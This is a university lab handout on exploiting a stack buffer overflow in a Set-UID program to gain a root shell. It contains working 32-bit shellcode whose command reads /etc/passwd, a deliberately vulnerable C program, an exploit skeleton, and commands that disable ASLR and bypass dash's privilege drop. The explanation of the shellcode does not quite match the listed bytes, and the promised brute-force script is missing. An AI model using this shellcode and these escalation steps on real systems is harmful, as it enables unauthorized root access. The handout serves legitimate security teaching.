Please read this description in its entirety before starting the assignment!
A buffer overflow is defined as the condition in which a program attempts to write data beyond the boundary of a buffer. This vulnerability can be used by a malicious user to alter the control flow of the program, leading to the execution of malicious code. You will be given a program with a buffer-overflow vulnerability; your task is to develop a scheme to exploit the vulnerability and ultimately gain root privilege. In addition to the attacks, you will be guided through several protection schemes that operating systems have implemented to counter buffer-overflow attacks, and you will gauge their efficacy. You will record your observations in a report and submit this report to Blackboard for grading.
In this lab, you will:
This assignment requires the use of the course VM.
Modern operating systems have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first. Later on, we will enable them and see whether our attack can still be successful or not.
Address Space Randomization. Ubuntu and several other Linux-based systems use address space randomization to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. This feature can be disabled using the following command:
$ sudo sysctl -w kernel.randomize_va_space=0
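The value set by this command can be read back from /proc/sys/kernel/randomize_va_space. The following is a minimal Python sketch, assuming a Linux system that exposes this file. The helper name describe_aslr is illustrative, and the descriptions paraphrase the Linux kernel sysctl documentation.

```python
from pathlib import Path

# File exposed by Linux for the kernel.randomize_va_space sysctl.
ASLR_SYSCTL = Path("/proc/sys/kernel/randomize_va_space")

def describe_aslr(value: int) -> str:
    """Map a kernel.randomize_va_space value to a short description."""
    meanings = {
        0: "disabled",
        1: "stack, mmap base, and VDSO randomized",
        2: "stack, mmap base, VDSO, and heap (brk) randomized",
    }
    return meanings.get(value, "unknown setting")

if __name__ == "__main__" and ASLR_SYSCTL.exists():
    current = int(ASLR_SYSCTL.read_text().strip())
    print(f"randomize_va_space = {current}: {describe_aslr(current)}")
```

After running the sysctl command above, this should report the value 0.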
StackGuard and Non-Executable Stack. These are two additional countermeasures implemented in the system. They can be turned off during compilation. We will discuss them later when we compile the vulnerable program.
The ultimate goal of buffer-overflow attacks is to inject malicious code into the target program, so the code can be executed using the target program’s privilege. Shellcode is widely used in most code-injection attacks.
A shellcode is basically a piece of code that launches a shell. If we use C code to implement it, it will look like the following:
#include <stdio.h>
#include <unistd.h>
int main() {
    char *name[2];
    name[0] = "/bin/bash";
    name[1] = NULL;
    execve(name[0], name, NULL);
}
Unfortunately, we cannot just compile this code and use the binary code as our shellcode. The best way to write a shellcode is to use assembly code. In this assignment, we only provide the binary version of a shellcode, without explaining how it works (it is non-trivial).
Our generic shellcode is listed in the following:
shellcode = (
   "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
   "/bin/bash*"                                                   # (1)
   "-c*"                                                          # (2)
   "/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd     *"  # (3)
   # The * in the above line serves as the position marker    *
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBB"   # Placeholder for argv[1] --> "-c"
   "CCCC"   # Placeholder for argv[2] --> the command string
   "DDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')
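The * markers in the data area have to sit at fixed positions, because the machine code addresses them with hard-coded displacements. The sketch below assumes that the displacement bytes 0x09, 0x0c, 0x47 and 0x48 in the listing are offsets from the start of "/bin/bash*"; that reading is an interpretation of the bytes, not something the handout states. The helper name build_data is hypothetical. It pads the command string with spaces so that the last marker stays in place when the command changes.

```python
# Offsets relative to the start of the data area, as read from the
# displacement bytes in the machine code (an assumption, see the text above).
MARK_ARG0, MARK_ARG1, MARK_CMD, ARGV_BASE = 0x09, 0x0C, 0x47, 0x48

def build_data(command: str) -> bytes:
    """Lay out the strings and argv placeholders, padding the command with spaces."""
    head = "/bin/bash*" + "-c*"
    width = MARK_CMD - len(head)      # room for the command before its '*'
    if len(command) > width:
        raise ValueError(f"command must be at most {width} characters")
    data = head + command.ljust(width) + "*" + "AAAA" + "BBBB" + "CCCC" + "DDDD"
    return data.encode("latin-1")

data = build_data("/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd")
# Every marker lands on the offset the machine code expects.
assert data[MARK_ARG0] == data[MARK_ARG1] == data[MARK_CMD] == ord("*")
assert data[ARGV_BASE:ARGV_BASE + 4] == b"AAAA"
```

If you replace the command string by hand instead, keep its total length unchanged by adding or removing spaces before the final *.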
The shellcode above basically invokes the execve() system call to execute /bin/sh.
The code pushes “//sh”, rather than “/sh”, onto the stack. This is because we need a 32-bit number here, and “/sh” has only 24 bits. Fortunately, “//” is equivalent to “/”, so we can get away with a double slash symbol.
Three arguments are passed to execve() via the ebx, ecx and edx registers, respectively. The majority of the shellcode basically constructs the content for these three arguments.
The system call execve() is called when we set al to 0x0b, and execute “int 0x80”.
We have generated the binary code from the assembly code above, and put the code in a C program called call_shellcode.c inside the shellcode/ folder.
Compile and run the 32-bit shellcode in call_shellcode.c, and observe what happens. The code includes two copies of shellcode: one is 32-bit and the other is 64-bit. We will only use the 32-bit shellcode in this assignment. Make sure to compile the program using the -m32 flag so that the 32-bit version is used; without this flag, the 64-bit version will be used. The Makefile already handles this.
In your report, describe your observations. Include a screenshot of the program running.
The vulnerable program used in this assignment is called stack.c, which is in the code folder. This program has a buffer-overflow vulnerability, and your job is to exploit this vulnerability and gain root privilege. The code listed below has some non-essential information removed, so it is slightly different from what you get from the repository.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif

void dummy_function(char *str);

int bof(char *str)
{
    char buffer[BUF_SIZE];

    // The following statement has a buffer overflow problem
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    if (!badfile) {
        perror("Opening badfile"); exit(1);
    }

    int length = fread(str, sizeof(char), 517, badfile);
    printf("Input size: %d\n", length);
    dummy_function(str);
    fprintf(stdout, "==== Returned Properly ====\n");
    return 1;
}
The above program has a buffer overflow vulnerability. It first reads an input from a file called badfile, and then passes this input to another buffer in the function bof(). The original input can have a maximum length of 517 bytes, but the buffer in bof() is only BUF_SIZE bytes long, which is less than 517. Because strcpy() does not check boundaries, a buffer overflow will occur. Since this program is a root-owned Set-UID program, if a normal user can exploit this buffer overflow vulnerability, the user might be able to get a root shell. It should be noted that the program gets its input from a file called badfile. This file is under users’ control. Now, our objective is to create the contents for badfile, such that when the vulnerable program copies the contents into its buffer, a root shell can be spawned.
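To make the size mismatch concrete, the following Python sketch models how many bytes a C strcpy() writes: it copies up to and including the first NUL byte, regardless of the destination size. The constants mirror stack.c; the helper name strcpy_copied and the sample input are illustrative assumptions, not part of the lab code.

```python
BUF_SIZE = 100      # default buffer size in stack.c
INPUT_MAX = 517     # bytes main() reads from badfile

def strcpy_copied(src: bytes) -> int:
    """Bytes a C strcpy() would write: everything up to the first NUL, plus the NUL."""
    end = src.find(b"\x00")
    if end == -1:
        raise ValueError("no terminating NUL in src")
    return end + 1

# Hypothetical input: 516 non-NUL bytes followed by a terminator.
sample = b"\x90" * (INPUT_MAX - 1) + b"\x00"
written = strcpy_copied(sample)
print(f"strcpy writes {written} bytes into a {BUF_SIZE}-byte buffer, "
      f"{written - BUF_SIZE} past its end")
```

The same model shows why a NUL byte in the middle of the input matters: everything after it is never copied.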
Compilation. To compile the above vulnerable program, do not forget to turn off the StackGuard and the non-executable stack protections using the -fno-stack-protector and -z execstack options. After the compilation, we need to make the program a root-owned Set-UID program. We can achieve this by first changing the ownership of the program to root, and then changing the permission to 4755 to enable the Set-UID bit. It should be noted that changing ownership must be done before turning on the Set-UID bit, because an ownership change will cause the Set-UID bit to be turned off.
$ gcc -DBUF_SIZE=100 -m32 -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
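The leading 4 in 4755 is the Set-UID bit, and 755 is the usual rwxr-xr-x permission set. As a small illustration, Python's standard stat module can decode the mode; the helper name describe_mode is hypothetical.

```python
import stat

def describe_mode(mode: int) -> str:
    """Render permission bits the way `ls -l` shows them for a regular file."""
    return stat.filemode(stat.S_IFREG | mode)

mode = 0o4755                               # the value passed to chmod above
print(bool(mode & stat.S_ISUID))            # True: the Set-UID bit (0o4000) is set
print(describe_mode(mode))                  # -rwsr-xr-x
print(describe_mode(0o755))                 # -rwxr-xr-x (no Set-UID bit)
```

The s in the owner's execute position is what `ls -l stack` should show after the chmod command.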
The compilation and setup commands are already included in Makefile, so we just need to type make to execute those commands. The variables L1, ..., L4 are set in Makefile; they will be used during the compilation.
To exploit the buffer-overflow vulnerability in the target program, the most important thing to know is the distance between the buffer’s starting position and the place where the return-address is stored. We will use a debugging method to find it out. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug.
We will add the -g flag to the gcc command, so debugging information is added to the binary. If you run make, the debugging version is already created. We will use gdb to debug stack-L1-dbg. We need to create a file called badfile before running the program.
$ touch badfile <- Create an empty badfile
$ gdb stack-L1-dbg
gdb-peda$ b bof <- Set a break point at function bof()
Breakpoint 1 at 0x124d: file stack.c, line 18.
gdb-peda$ run <- Start executing the program
...
Breakpoint 1, bof (str=0xffffcf57 ...) at stack.c:18
18 {
gdb-peda$ next <- See the note below
...
22 strcpy(buffer, str);
gdb-peda$ p $ebp <- Get the ebp value
$1 = (void *) 0xffffdfd8
gdb-peda$ p &buffer <- Get the buffer’s address
$2 = (char (*)[100]) 0xffffdfac
gdb-peda$ quit <- Exit
Note 1. When gdb stops inside the bof() function, it stops before the ebp register is set to point to the current stack frame, so if we print out the value of ebp here, we will get the caller’s ebp value. We need to use next to execute a few instructions and stop after the ebp register is modified to point to the stack frame of the bof() function. The SEED book is based on Ubuntu 16.04, where gdb’s behavior is slightly different, so the book does not have the next step.
Note 2. It should be noted that the frame pointer value obtained from gdb is different from that during the actual execution (without using gdb). This is because gdb has pushed some environment data onto the stack before running the debugged program. When the program runs directly without using gdb, the stack does not have that data, so the actual frame pointer value will be larger. You should keep this in mind when constructing your payload.
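The two values printed by gdb give the distance directly. The arithmetic below uses the numbers from the sample session above, so your own values will differ, especially if BUF_SIZE differs. It also assumes the conventional 32-bit x86 frame layout, in which the return address is stored in the 4 bytes just above the saved ebp.

```python
ebp = 0xFFFFDFD8      # "p $ebp" in the sample session
buffer = 0xFFFFDFAC   # "p &buffer" in the sample session

distance_to_ebp = ebp - buffer        # bytes from buffer[0] to the saved ebp
ret_offset = distance_to_ebp + 4      # skip the 4-byte saved ebp (assumed layout)

print(hex(distance_to_ebp), distance_to_ebp, ret_offset)   # 0x2c 44 48
```

Because of Note 2, only the distance carries over to a run outside gdb; the absolute addresses do not.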
To exploit the buffer-overflow vulnerability in the target program, we need to prepare a payload, and save it inside badfile. We will use a Python program to do that. We provide a skeleton program called exploit.py, which is included in the repository. The code is incomplete, and students need to replace some of the essential values in the code.
#!/usr/bin/python3
import sys

# Replace the content with the actual shellcode
shellcode = (
  "\x90\x90\x90\x90"
  "\x90\x90\x90\x90"
).encode('latin-1')

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

##################################################################
# Put the shellcode somewhere in the payload
start = 0               # Change this number
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret    = 0x00           # Change this number
offset = 0              # Change this number

L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little')
##################################################################

# Write the content to a file
with open('badfile', 'wb') as f:
  f.write(content)
Run this program to generate the contents for badfile. Then run the vulnerable program stack.
$ ./exploit.py <- create the badfile
$ ./stack-L1 <- launch the attack by running the vulnerable program
Finish the above program to execute the buffer overflow attack. If your exploit is implemented correctly, you should be able to get a root shell:
$ ./exploit.py
$ ./stack-L1
# <- Bingo! You've got a root shell!
In your report, in addition to providing screenshots to demonstrate your investigation and attack, you also need to explain how the values used in your exploit.py are decided. These values are the most important part of the attack, so a detailed explanation can help the instructor grade your report. Only demonstrating a successful attack without explaining why the attack works will not receive many points.
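Before launching the attack, it can help to sanity-check the layout of the payload. The sketch below is one possible check, not part of the provided skeleton: the function name check_payload and all numbers in the usage lines are hypothetical placeholders, not the values for this lab. It relies on two facts: the return-address slot must not overwrite the shellcode, and strcpy() stops copying at the first NUL byte, so a NUL anywhere up to the end of the return address keeps the address from being written in full.

```python
def check_payload(content: bytes, start: int, shellcode_len: int,
                  offset: int, addr_len: int = 4) -> list:
    """Return a list of layout problems; an empty list means none were found."""
    problems = []
    end = start + shellcode_len
    if end > len(content):
        problems.append("shellcode runs past the end of the payload")
    if offset + addr_len > len(content):
        problems.append("return address runs past the end of the payload")
    if start < offset + addr_len and offset < end:
        problems.append("return address overlaps the shellcode")
    nul = content.find(b"\x00", 0, offset + addr_len)
    if nul != -1:
        problems.append(f"NUL byte at index {nul} stops strcpy() early")
    return problems

# Placeholder values for illustration only.
content = bytearray(0x90 for _ in range(517))
content[112:116] = (0xFFFFD1A0).to_bytes(4, byteorder="little")
print(check_payload(content, start=300, shellcode_len=32, offset=112))   # []
```

An empty list only means the layout is self-consistent; whether the return address actually lands in the NOP region still depends on the values you derive from your own debugging session.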
dash’s countermeasure
The dash shell in Ubuntu drops privileges when it detects that the effective UID does not equal the real UID (which is the case in a Set-UID program). This is achieved by changing the effective UID back to the real UID, essentially dropping the privilege. In the previous tasks, we let /bin/sh point to another shell called zsh, which does not have such a countermeasure. In this task, we will change it back, and see how we can defeat the countermeasure. Please do the following, so /bin/sh points back to /bin/dash.
$ sudo ln -sf /bin/dash /bin/sh
To defeat the countermeasure in buffer-overflow attacks, all we need to do is to change the real UID, so it equals the effective UID. When a root-owned Set-UID program runs, the effective UID is zero, so before we invoke the shell program, we just need to change the real UID to zero. We can achieve this by invoking setuid(0) before executing execve() in the shellcode.
The following assembly code shows how to invoke setuid(0). The binary code is already put inside call_shellcode.c. You just need to add it to the beginning of the shellcode.
; Invoke setuid(0): 32-bit
xor ebx, ebx ; ebx = 0: setuid()’s argument
xor eax, eax
mov al, 0xd5 ; setuid()’s system call number
int 0x80
; Invoke setuid(0): 64-bit
xor rdi, rdi ; rdi = 0: setuid()’s argument
xor rax, rax
mov al, 0x69 ; setuid()’s system call number
syscall
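As a sketch of what "add it to the beginning of the shellcode" looks like in exploit.py, the bytes below are a hand assembly of the 32-bit sequence above; treat them as an assumption and compare them with the copy in call_shellcode.c before relying on them. The helper names with_setuid and dash_would_drop are hypothetical; the second one simply restates the check described earlier (effective UID different from real UID).

```python
import os

# Hand-assembled bytes for the 32-bit sequence above (verify against call_shellcode.c):
#   31 db   xor ebx, ebx
#   31 c0   xor eax, eax
#   b0 d5   mov al, 0xd5
#   cd 80   int 0x80
SETUID0_32 = b"\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"

def with_setuid(shellcode: bytes) -> bytes:
    """Prepend the setuid(0) sequence so it runs before the rest of the shellcode."""
    return SETUID0_32 + shellcode

def dash_would_drop(real_uid: int, effective_uid: int) -> bool:
    """Model of the check described above: privileges drop when the UIDs differ."""
    return real_uid != effective_uid

if __name__ == "__main__":
    # For an ordinary (non-Set-UID) process both values are the same.
    print(os.getuid(), os.geteuid(), dash_would_drop(os.getuid(), os.geteuid()))
```

Note that the prefix makes the shellcode 8 bytes longer, which matters when you choose where to place it in the payload.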
Compile call_shellcode.c into a root-owned binary (by typing “make setuid”). Run the shellcode a32.out without the setuid(0) system call. Please describe and explain your observations. Include a screenshot in your report.
Run a32.out with the setuid(0) system call. Please describe and explain your observations. Include a screenshot in your report.
# ls -l /bin/sh /bin/zsh /bin/dash
On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 2^19 = 524,288 possibilities. This number is not that high and can be exhausted easily with the brute-force approach. In this part, we use such an approach to defeat the address randomization countermeasure on our 32-bit VM.
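The size of the search space can be checked with a few lines of Python. The estimate of the number of attempts is a rough sketch under two assumptions that the handout does not state: every run draws a fresh, uniformly random stack base, and a fixed fraction of those bases makes the guessed return address work. The function name expected_attempts is illustrative.

```python
ENTROPY_BITS = 19
candidates = 2 ** ENTROPY_BITS
print(candidates)    # 524288

def expected_attempts(hit_fraction: float) -> float:
    """Mean number of independent tries until the first success."""
    return 1.0 / hit_fraction

# If exactly one stack base out of all candidates makes the guess correct:
print(expected_attempts(1 / candidates))    # 524288.0
```

Under these assumptions, anything that makes more stack bases acceptable (for example a larger NOP region in front of the shellcode) raises hit_fraction and lowers the expected number of runs.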
Turn on address randomization using the following command, then repeat the attack against stack-L1. Please describe and explain your observation in your report.
$ sudo /sbin/sysctl -w kernel.randomize_va_space=2
Then attack the vulnerable program repeatedly, hoping that the address we put in badfile can eventually be correct. We will only try this on stack-L1, which is a 32-bit program. You can use the following shell script to run the vulnerable program in an infinite loop. If your attack succeeds, the script will stop; otherwise, it will keep running. Please be patient, as this may take a few minutes, but if you are very unlucky, it may take longer. Please describe your observation in your report. Include a screenshot in your report.
Many compilers, such as gcc, implement a security mechanism called StackGuard to prevent buffer overflows. In the presence of this protection, buffer overflow attacks will not work. In the previous parts, we disabled the StackGuard protection mechanism when compiling the programs. In this part, we will turn it on and see what will happen.
First, repeat the Level-1 attack with StackGuard off, and make sure that the attack is still successful. Remember to turn off address randomization, because you turned it on in the previous task. Then turn on the StackGuard protection by recompiling the vulnerable stack.c program without the -fno-stack-protector flag. In gcc version 4.3.3 and above, StackGuard is enabled by default. Launch the attack; report and explain your observations. Include a screenshot in your report.
Operating systems used to allow executable stacks, but this has now changed: in Ubuntu, the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. The kernel or dynamic linker uses this marking to decide whether to make the stack of the running program executable or non-executable. This marking is done automatically by gcc, which by default makes the stack non-executable. We can explicitly make it non-executable using the “-z noexecstack” flag in the compilation. In our previous tasks, we used “-z execstack” to make stacks executable.
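The field in question is the flags word of the PT_GNU_STACK program header. The following Python sketch reads it from a 32-bit little-endian ELF image, which is the kind of binary -m32 produces on the course VM. The function name stack_is_executable is hypothetical, and the sketch deliberately does not handle 64-bit or big-endian files.

```python
import struct
from typing import Optional

PT_GNU_STACK = 0x6474E551   # program header type carrying the stack permissions
PF_X = 0x1                  # "execute" bit in a program header's p_flags

def stack_is_executable(image: bytes) -> Optional[bool]:
    """Inspect a 32-bit little-endian ELF image.

    Returns True or False from the PT_GNU_STACK flags, or None when the image
    has no PT_GNU_STACK entry (the default then depends on the platform).
    """
    if image[:4] != b"\x7fELF" or image[4] != 1 or image[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF image")
    (e_phoff,) = struct.unpack_from("<I", image, 28)          # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 42)
    for index in range(e_phnum):
        base = e_phoff + index * e_phentsize
        (p_type,) = struct.unpack_from("<I", image, base)
        (p_flags,) = struct.unpack_from("<I", image, base + 24)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None
```

A possible use is `stack_is_executable(open("a32.out", "rb").read())`, comparing a build with “-z execstack” against one without it. The same information appears as the GNU_STACK line in the output of `readelf -l`.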
Aside. It should be noted that non-executable stack only makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-libc attack is an example.
In this task, we will make the stack non-executable. We will do this experiment in the shellcode folder. The call_shellcode program puts a copy of shellcode on the stack, and then executes the code from the stack. Please recompile call_shellcode.c into a32.out, without the “-z execstack” option. Run it, and describe and explain your observations. Include a screenshot in your report.
Submit the following to Blackboard before the assignment due date:
Only one submission per group is necessary. Blackboard is set up with your groups for this lab.
Original SEED Labs version Copyright © 2006-2020 Wenliang Du. Modifications by Tushar Jois for Secure Systems Engineering, Spring 2024.
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. If you remix, transform, or build upon the material, this copyright notice must be left intact, or reproduced in a way that is reasonable to the medium in which the work is being re-published.